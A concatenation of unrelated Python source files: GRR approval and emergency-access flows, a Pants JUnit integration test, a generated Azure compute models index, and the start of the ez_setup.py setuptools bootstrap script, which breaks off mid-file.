fd = aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users").Add(self.args.delegate),
"GRRUser", mode="rw", token=self.token)
fd.Notify("ViewObject", self.args.subject_urn,
"%s has granted you access to %s."
% (self.token.username, subject_title), self.session_id)
fd.Close()
template = u"""
<html><body><h1>Access to %(subject_title)s granted.</h1>
The user %(username)s has granted access to %(subject_title)s for the
purpose of "%(reason)s".
Please click <a href='%(admin_ui)s#%(subject_urn)s'>here</a> to access it.
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
body = template % dict(
subject_title=subject_title,
username=self.token.username,
reason=self.args.reason,
admin_ui=config_lib.CONFIG["AdminUI.url"],
subject_urn=access_urn,
signature=config_lib.CONFIG["Email.signature"]
)
# Email subject should match the approval request, and we add message id
# references so Gmail groups the messages together in a thread.
subject = u"Approval for %s to access %s." % (
utils.SmartStr(self.args.delegate), subject_title)
headers = {"In-Reply-To": email_msg_id, "References": email_msg_id}
email_alerts.SendEmail(utils.SmartStr(self.args.delegate),
utils.SmartStr(self.token.username), subject,
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG[
"Email.approval_cc_address"],
headers=headers)
class BreakGlassGrantApprovalWithReasonFlow(GrantApprovalWithReasonFlow):
"""Grant an approval in an emergency."""
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
# Create a new Approval object.
approval_request = aff4.FACTORY.Create(approval_urn,
aff4_type=self.approval_type,
token=self.token)
approval_request.Set(approval_request.Schema.REASON(self.args.reason))
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
# This is a break glass approval.
break_glass = approval_request.Schema.BREAK_GLASS().Now()
# By default a break_glass approval only lasts 24 hours.
break_glass += 60 * 60 * 24 * 1e6
approval_request.Set(break_glass)
approval_request.Close(sync=True)
# Notify the user.
fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("users").Add(
self.token.username), "GRRUser", mode="rw", token=self.token)
fd.Notify("ViewObject", self.args.subject_urn,
"An Emergency Approval has been granted to access "
"%s." % subject_title, self.session_id)
fd.Close()
template = u"""
<html><body><h1>Emergency Access Granted.</h1>
The user %(username)s has requested emergency access to %(subject_title)s
for the purpose of: "%(reason)s".
This access has been logged and granted for 24 hours.
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
body = template % dict(
username=self.token.username,
subject_title=subject_title,
reason=self.args.reason,
signature=config_lib.CONFIG["Email.signature"])
email_alerts.SendEmail(
config_lib.CONFIG["Monitoring.emergency_access_email"],
self.token.username,
u"Emergency approval granted for %s." % subject_title,
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG["Email.approval_cc_address"])
class RequestClientApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to access a client."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
event = rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_REQUEST",
client=self.client_id,
description=self.args.reason)
flow.Events.PublishEvent("Audit", event, token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.token.username,
self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class GrantClientApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant the approval requested."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_GRANT",
client=self.client_id,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.args.delegate,
self.args.reason)
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode((("c", self.client_id),
("main", "HostInformation")))
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class BreakGlassGrantClientApprovalFlow(BreakGlassGrantApprovalWithReasonFlow):
"""Grant an approval in an emergency."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
event = rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_BREAK_GLASS_REQUEST",
client=self.client_id,
description=self.args.reason)
flow.Events.PublishEvent("Audit", event, token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.token.username,
self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class RequestHuntApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to run a hunt."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "HuntApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="HUNT_APPROVAL_REQUEST",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.token.username, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"hunt %s" % self.args.subject_urn.Basename()
class GrantHuntApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant the approval requested."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "HuntApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="HUNT_APPROVAL_GRANT",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.args.delegate, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"hunt %s" % self.args.subject_urn.Basename()
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode((("main", "ManageHunts"),
("hunt", self.args.subject_urn)))
class RequestCronJobApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to manage a cron job."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "CronJobApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is the cron job's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CRON_APPROVAL_REQUEST",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.token.username, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"a cron job"
class GrantCronJobApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant approval to manage a cron job."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "CronJobApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is the cron job's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CRON_APPROVAL_GRANT",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.args.delegate, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"a cron job"
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode({"main": "ManageCron"})
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.base.build_environment import get_buildroot
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class JunitTestsIntegrationTest(PantsRunIntegrationTest):
def _assert_output_for_class(self, workdir, classname):
def get_outdir(basedir):
return os.path.join(basedir, 'test', 'junit')
def get_stdout_file(basedir):
return os.path.join(basedir, '{}.out.txt'.format(classname))
def get_stderr_file(basedir):
return os.path.join(basedir, '{}.err.txt'.format(classname))
outdir = get_outdir(os.path.join(get_buildroot(), 'dist'))
self.assertTrue(os.path.exists(get_stdout_file(outdir)))
self.assertTrue(os.path.exists(get_stderr_file(outdir)))
legacy_outdir = get_outdir(workdir)
self.assertFalse(os.path.exists(get_stdout_file(legacy_outdir)))
self.assertFalse(os.path.exists(get_stderr_file(legacy_outdir)))
def test_junit_test_custom_interpreter(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['test.junit',
'examples/tests/java/org/pantsbuild/example/hello/greet',
'examples/tests/scala/org/pantsbuild/example/hello/welcome'],
workdir)
self.assert_success(pants_run)
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.greet.GreetingTest')
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.welcome.WelSpec')
def test_junit_test(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir([
'test',
'testprojects/tests/scala/org/pantsbuild/testproject/empty'],
workdir)
self.assert_failure(pants_run)
def test_junit_test_with_test_option_with_classname(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['test.junit',
'--test=org.pantsbuild.example.hello.greet.GreetingTest',
'examples/tests/java/org/pantsbuild/example/hello/greet',
'examples/tests/scala/org/pantsbuild/example/hello/welcome'],
workdir)
self.assert_success(pants_run)
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.greet.GreetingTest')
def test_junit_test_requiring_cwd_fails_without_option_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true'])
self.assert_failure(pants_run)
def test_junit_test_requiring_cwd_passes_with_option_with_value_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true',
'--no-test-junit-chroot',
'--test-junit-cwd=testprojects/src/java/org/pantsbuild/testproject/cwdexample/subdir'])
self.assert_success(pants_run)
def test_junit_test_requiring_cwd_fails_with_option_with_no_value_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true'])
self.assert_failure(pants_run)
def test_junit_test_early_exit(self):
pants_run = self.run_pants([
'test',
'testprojects/src/java/org/pantsbuild/testproject/junit/earlyexit:tests'])
self.assert_failure(pants_run)
self.assertIn('java.lang.UnknownError: Abnormal VM exit - test crashed.', pants_run.stdout_data)
self.assertIn('Tests run: 0, Failures: 1', pants_run.stdout_data)
self.assertIn('FATAL: VM exiting unexpectedly.', pants_run.stdout_data)
def test_junit_test_target_cwd(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/workdirs/onedir'])
self.assert_success(pants_run)
def test_junit_test_annotation_processor(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/annotation'])
self.assert_success(pants_run)
def test_junit_test_256_failures(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/fail256'])
self.assert_failure(pants_run)
self.assertIn('Failures: 256', pants_run.stdout_data)
def test_junit_test_duplicate_resources(self):
pants_run = self.run_pants([
'test',
'testprojects/maven_layout/junit_resource_collision'])
self.assert_success(pants_run)
def test_junit_test_target_cwd_overrides_option(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/workdirs/onedir',
'--no-test-junit-chroot',
'--test-junit-cwd=testprojects/tests/java/org/pantsbuild/testproject/dummies'])
self.assert_success(pants_run)
def test_junit_test_failure_summary(self):
with self.temporary_workdir() as workdir:
failing_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/failing'
with self.source_clone(failing_tree) as failing:
failing_addr = os.path.join(failing, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit', '--failure-summary', failing_addr],
workdir)
self.assert_failure(pants_run)
expected_groups = []
expected_groups.append([
'org/pantsbuild/tmp/tests:one',
'org.pantsbuild.tmp.tests.OneTest#testSingle'
])
expected_groups.append([
'org/pantsbuild/tmp/tests:two',
'org.pantsbuild.tmp.tests.TwoTest#testTupleFirst',
'org.pantsbuild.tmp.tests.TwoTest#testTupleSecond',
])
expected_groups.append([
'org/pantsbuild/tmp/tests:three',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleFirst',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleSecond',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleThird',
])
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
for group in expected_groups:
self.assertIn('\n'.join(group), output)
def test_junit_test_no_failure_summary(self):
with self.temporary_workdir() as workdir:
failing_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/failing'
with self.source_clone(failing_tree) as failing:
failing_addr = os.path.join(failing, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit',
'--no-failure-summary',
failing_addr],
workdir)
self.assert_failure(pants_run)
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
self.assertNotIn('org/pantsbuild/tmp/tests:three\n'
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleFirst',
output)
def test_junit_test_successes_and_failures(self):
with self.temporary_workdir() as workdir:
mixed_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/mixed'
with self.source_clone(mixed_tree) as mixed:
mixed_addr = os.path.join(mixed, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit',
'--failure-summary',
'--no-fail-fast',
mixed_addr],
workdir)
group = [
'org/pantsbuild/tmp/tests',
'org.pantsbuild.tmp.tests.AllTests#test1Failure',
'org.pantsbuild.tmp.tests.AllTests#test3Failure',
'org.pantsbuild.tmp.tests.AllTests#test4Error',
'org.pantsbuild.tmp.tests.InnerClassTests$InnerClassFailureTest#testInnerFailure',
'org.pantsbuild.tmp.tests.InnerClassTests$InnerInnerTest$InnerFailureTest#testFailure']
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
self.assertIn('\n'.join(group), output,
'{group}\n not found in\n\n{output}.'.format(group='\n'.join(group),
output=output))
self.assertNotIn('org.pantsbuild.tmp.tests.AllTests#test2Success', output)
self.assertNotIn('org.pantsbuild.tmp.tests.AllTestsBase', output)
self.assertNotIn('org.pantsbuild.tmp.tests.AllTests$InnerClassSuccessTest', output)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .instance_view_status import InstanceViewStatus
from .sub_resource import SubResource
from .sku import Sku
from .availability_set import AvailabilitySet
from .virtual_machine_size import VirtualMachineSize
from .virtual_machine_extension_image import VirtualMachineExtensionImage
from .virtual_machine_image_resource import VirtualMachineImageResource
from .virtual_machine_extension_instance_view import VirtualMachineExtensionInstanceView
from .virtual_machine_extension import VirtualMachineExtension
from .purchase_plan import PurchasePlan
from .os_disk_image import OSDiskImage
from .data_disk_image import DataDiskImage
from .virtual_machine_image import VirtualMachineImage
from .usage_name import UsageName
from .usage import Usage
from .virtual_machine_capture_parameters import VirtualMachineCaptureParameters
from .virtual_machine_capture_result import VirtualMachineCaptureResult
from .plan import Plan
from .hardware_profile import HardwareProfile
from .image_reference import ImageReference
from .key_vault_secret_reference import KeyVaultSecretReference
from .key_vault_key_reference import KeyVaultKeyReference
from .disk_encryption_settings import DiskEncryptionSettings
from .virtual_hard_disk import VirtualHardDisk
from .managed_disk_parameters import ManagedDiskParameters
from .os_disk import OSDisk
from .data_disk import DataDisk
from .storage_profile import StorageProfile
from .additional_unattend_content import AdditionalUnattendContent
from .win_rm_listener import WinRMListener
from .win_rm_configuration import WinRMConfiguration
from .windows_configuration import WindowsConfiguration
from .ssh_public_key import SshPublicKey
from .ssh_configuration import SshConfiguration
from .linux_configuration import LinuxConfiguration
from .vault_certificate import VaultCertificate
from .vault_secret_group import VaultSecretGroup
from .os_profile import OSProfile
from .network_interface_reference import NetworkInterfaceReference
from .network_profile import NetworkProfile
from .boot_diagnostics import BootDiagnostics
from .diagnostics_profile import DiagnosticsProfile
from .virtual_machine_extension_handler_instance_view import VirtualMachineExtensionHandlerInstanceView
from .virtual_machine_agent_instance_view import VirtualMachineAgentInstanceView
from .disk_instance_view import DiskInstanceView
from .boot_diagnostics_instance_view import BootDiagnosticsInstanceView
from .virtual_machine_instance_view import VirtualMachineInstanceView
from .virtual_machine import VirtualMachine
from .upgrade_policy import UpgradePolicy
from .image_os_disk import ImageOSDisk
from .image_data_disk import ImageDataDisk
from .image_storage_profile import ImageStorageProfile
from .image import Image
from .virtual_machine_scale_set_os_profile import VirtualMachineScaleSetOSProfile
from .virtual_machine_scale_set_managed_disk_parameters import VirtualMachineScaleSetManagedDiskParameters
from .virtual_machine_scale_set_os_disk import VirtualMachineScaleSetOSDisk
from .virtual_machine_scale_set_data_disk import VirtualMachineScaleSetDataDisk
from .virtual_machine_scale_set_storage_profile import VirtualMachineScaleSetStorageProfile
from .api_entity_reference import ApiEntityReference
from .virtual_machine_scale_set_ip_configuration import VirtualMachineScaleSetIPConfiguration
from .virtual_machine_scale_set_network_configuration import VirtualMachineScaleSetNetworkConfiguration
from .virtual_machine_scale_set_network_profile import VirtualMachineScaleSetNetworkProfile
from .virtual_machine_scale_set_extension import VirtualMachineScaleSetExtension
from .virtual_machine_scale_set_extension_profile import VirtualMachineScaleSetExtensionProfile
from .virtual_machine_scale_set_vm_profile import VirtualMachineScaleSetVMProfile
from .virtual_machine_scale_set import VirtualMachineScaleSet
from .virtual_machine_scale_set_vm_instance_ids import VirtualMachineScaleSetVMInstanceIDs
from .virtual_machine_scale_set_vm_instance_required_ids import VirtualMachineScaleSetVMInstanceRequiredIDs
from .virtual_machine_status_code_count import VirtualMachineStatusCodeCount
from .virtual_machine_scale_set_instance_view_statuses_summary import VirtualMachineScaleSetInstanceViewStatusesSummary
from .virtual_machine_scale_set_vm_extensions_summary import VirtualMachineScaleSetVMExtensionsSummary
from .virtual_machine_scale_set_instance_view import VirtualMachineScaleSetInstanceView
from .virtual_machine_scale_set_sku_capacity import VirtualMachineScaleSetSkuCapacity
from .virtual_machine_scale_set_sku import VirtualMachineScaleSetSku
from .virtual_machine_scale_set_vm import VirtualMachineScaleSetVM
from .virtual_machine_scale_set_vm_instance_view import VirtualMachineScaleSetVMInstanceView
from .api_error_base import ApiErrorBase
from .inner_error import InnerError
from .api_error import ApiError
from .compute_long_running_operation_properties import ComputeLongRunningOperationProperties
from .resource import Resource
from .sub_resource_read_only import SubResourceReadOnly
from .operation_status_response import OperationStatusResponse
from .container_service_custom_profile import ContainerServiceCustomProfile
from .container_service_service_principal_profile import ContainerServiceServicePrincipalProfile
from .container_service_orchestrator_profile import ContainerServiceOrchestratorProfile
from .container_service_master_profile import ContainerServiceMasterProfile
from .container_service_agent_pool_profile import ContainerServiceAgentPoolProfile
from .container_service_windows_profile import ContainerServiceWindowsProfile
from .container_service_ssh_public_key import ContainerServiceSshPublicKey
from .container_service_ssh_configuration import ContainerServiceSshConfiguration
from .container_service_linux_profile import ContainerServiceLinuxProfile
from .container_service_vm_diagnostics import ContainerServiceVMDiagnostics
from .container_service_diagnostics_profile import ContainerServiceDiagnosticsProfile
from .container_service import ContainerService
from .resource_update import ResourceUpdate
from .image_disk_reference import ImageDiskReference
from .creation_data import CreationData
from .source_vault import SourceVault
from .key_vault_and_secret_reference import KeyVaultAndSecretReference
from .key_vault_and_key_reference import KeyVaultAndKeyReference
from .encryption_settings import EncryptionSettings
from .disk import Disk
from .disk_update import DiskUpdate
from .grant_access_data import GrantAccessData
from .access_uri import AccessUri
from .snapshot import Snapshot
from .snapshot_update import SnapshotUpdate
from .availability_set_paged import AvailabilitySetPaged
from .virtual_machine_size_paged import VirtualMachineSizePaged
from .usage_paged import UsagePaged
from .image_paged import ImagePaged
from .virtual_machine_paged import VirtualMachinePaged
from .virtual_machine_scale_set_paged import VirtualMachineScaleSetPaged
from .virtual_machine_scale_set_sku_paged import VirtualMachineScaleSetSkuPaged
from .virtual_machine_scale_set_vm_paged import VirtualMachineScaleSetVMPaged
from .container_service_paged import ContainerServicePaged
from .disk_paged import DiskPaged
from .snapshot_paged import SnapshotPaged
from .compute_management_client_enums import (
StatusLevelTypes,
OperatingSystemTypes,
VirtualMachineSizeTypes,
CachingTypes,
DiskCreateOptionTypes,
StorageAccountTypes,
PassNames,
ComponentNames,
SettingNames,
ProtocolTypes,
UpgradeMode,
OperatingSystemStateTypes,
VirtualMachineScaleSetSkuScaleType,
ContainerServiceOchestratorTypes,
ContainerServiceVMSizeTypes,
DiskCreateOption,
AccessLevel,
InstanceViewTypes,
)
__all__ = [
'InstanceViewStatus',
'SubResource',
'Sku',
'AvailabilitySet',
'VirtualMachineSize',
'VirtualMachineExtensionImage',
'VirtualMachineImageResource',
'VirtualMachineExtensionInstanceView',
'VirtualMachineExtension',
'PurchasePlan',
'OSDiskImage',
'DataDiskImage',
'VirtualMachineImage',
'UsageName',
'Usage',
'VirtualMachineCaptureParameters',
'VirtualMachineCaptureResult',
'Plan',
'HardwareProfile',
'ImageReference',
'KeyVaultSecretReference',
'KeyVaultKeyReference',
'DiskEncryptionSettings',
'VirtualHardDisk',
'ManagedDiskParameters',
'OSDisk',
'DataDisk',
'StorageProfile',
'AdditionalUnattendContent',
'WinRMListener',
'WinRMConfiguration',
'WindowsConfiguration',
'SshPublicKey',
'SshConfiguration',
'LinuxConfiguration',
'VaultCertificate',
'VaultSecretGroup',
'OSProfile',
'NetworkInterfaceReference',
'NetworkProfile',
'BootDiagnostics',
'DiagnosticsProfile',
'VirtualMachineExtensionHandlerInstanceView',
'VirtualMachineAgentInstanceView',
'DiskInstanceView',
'BootDiagnosticsInstanceView',
'VirtualMachineInstanceView',
'VirtualMachine',
'UpgradePolicy',
'ImageOSDisk',
'ImageDataDisk',
'ImageStorageProfile',
'Image',
'VirtualMachineScaleSetOSProfile',
'VirtualMachineScaleSetManagedDiskParameters',
'VirtualMachineScaleSetOSDisk',
'VirtualMachineScaleSetDataDisk',
'VirtualMachineScaleSetStorageProfile',
'ApiEntityReference',
'VirtualMachineScaleSetIPConfiguration',
'VirtualMachineScaleSetNetworkConfiguration',
'VirtualMachineScaleSetNetworkProfile',
'VirtualMachineScaleSetExtension',
'VirtualMachineScaleSetExtensionProfile',
'VirtualMachineScaleSetVMProfile',
'VirtualMachineScaleSet',
'VirtualMachineScaleSetVMInstanceIDs',
'VirtualMachineScaleSetVMInstanceRequiredIDs',
'VirtualMachineStatusCodeCount',
'VirtualMachineScaleSetInstanceViewStatusesSummary',
'VirtualMachineScaleSetVMExtensionsSummary',
'VirtualMachineScaleSetInstanceView',
'VirtualMachineScaleSetSkuCapacity',
'VirtualMachineScaleSetSku',
'VirtualMachineScaleSetVM',
'VirtualMachineScaleSetVMInstanceView',
'ApiErrorBase',
'InnerError',
'ApiError',
'ComputeLongRunningOperationProperties',
'Resource',
'SubResourceReadOnly',
'OperationStatusResponse',
'ContainerServiceCustomProfile',
'ContainerServiceServicePrincipalProfile',
'ContainerServiceOrchestratorProfile',
'ContainerServiceMasterProfile',
'ContainerServiceAgentPoolProfile',
'ContainerServiceWindowsProfile',
'ContainerServiceSshPublicKey',
'ContainerServiceSshConfiguration',
'ContainerServiceLinuxProfile',
'ContainerServiceVMDiagnostics',
'ContainerServiceDiagnosticsProfile',
'ContainerService',
'ResourceUpdate',
'ImageDiskReference',
'CreationData',
'SourceVault',
'KeyVaultAndSecretReference',
'KeyVaultAndKeyReference',
'EncryptionSettings',
'Disk',
'DiskUpdate',
'GrantAccessData',
'AccessUri',
'Snapshot',
'SnapshotUpdate',
'AvailabilitySetPaged',
'VirtualMachineSizePaged',
'UsagePaged',
'ImagePaged',
'VirtualMachinePaged',
'VirtualMachineScaleSetPaged',
'VirtualMachineScaleSetSkuPaged',
'VirtualMachineScaleSetVMPaged',
'ContainerServicePaged',
'DiskPaged',
'SnapshotPaged',
'StatusLevelTypes',
'OperatingSystemTypes',
'VirtualMachineSizeTypes',
'CachingTypes',
'DiskCreateOptionTypes',
'StorageAccountTypes',
'PassNames',
'ComponentNames',
'SettingNames',
'ProtocolTypes',
'UpgradeMode',
'OperatingSystemStateTypes',
'VirtualMachineScaleSetSkuScaleType',
'ContainerServiceOchestratorTypes',
'ContainerServiceVMSizeTypes',
'DiskCreateOption',
'AccessLevel',
'InstanceViewTypes',
]
|
|
#!/usr/bin/env python
"""Bootstrap setuptools installation
To use setuptools in your package's setup.py, include this
file in the same directory and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
To require a specific version of setuptools, set a download
mirror, or use an alternate download directory, simply supply
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import zipfile
import optparse
import subprocess
import platform
import textwrap
import contextlib
from distutils import log
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "5.7"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
def _python_cmd(*args):
"""
Return True if the command succeeded.
"""
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _install(archive_filename, install_args=()):
with archive_context(archive_filename):
# installing
log.warn('Installing Setuptools')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
def _build_egg(egg, archive_filename, to_dir):
with archive_context(archive_filename):
# building an egg
log.warn('Building a Setuptools egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
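# Usage sketch (hypothetical archive name): behaves the same on Python 2.6,
# where ZipFile lacks __exit__, as on later versions:
#   with ContextualZipFile('setuptools-5.7.zip') as archive:
#       archive.extractall()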
@contextlib.contextmanager
def archive_context(filename):
# extracting the archive
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
with ContextualZipFile(filename) as archive:
archive.extractall()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
yield
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
def _do_download(version, download_base, to_dir, download_delay):
egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
archive = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, archive, to_dir)
sys.path.insert(0, egg)
# Remove previously-imported pkg_resources if present (see
# https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
if 'pkg_resources' in sys.modules:
del sys.modules['pkg_resources']
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, download_delay=15):
to_dir = os.path.abspath(to_dir)
rep_modules = 'pkg_resources', 'setuptools'
imported = set(sys.modules).intersection(rep_modules)
try:
import pkg_resources
except ImportError:
return _do_download(version, download_base, to_dir, download_delay)
try:
pkg_resources.require("setuptools>=" + version)
return
except pkg_resources.DistributionNotFound:
return _do_download(version, download_base, to_dir, download_delay)
except pkg_resources.VersionConflict as VC_err:
if imported:
msg = textwrap.dedent("""
The required version of setuptools (>={version}) is not available,
and can't be installed while this script is running. Please
install a more recent version first, using
'easy_install -U setuptools'.
(Currently using {VC_err.args[0]!r})
""").format(VC_err=VC_err, version=version)
sys.stderr.write(msg)
sys.exit(2)
# otherwise, reload ok
del pkg_resources, sys.modules['pkg_resources']
return _do_download(version, download_base, to_dir, download_delay)
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
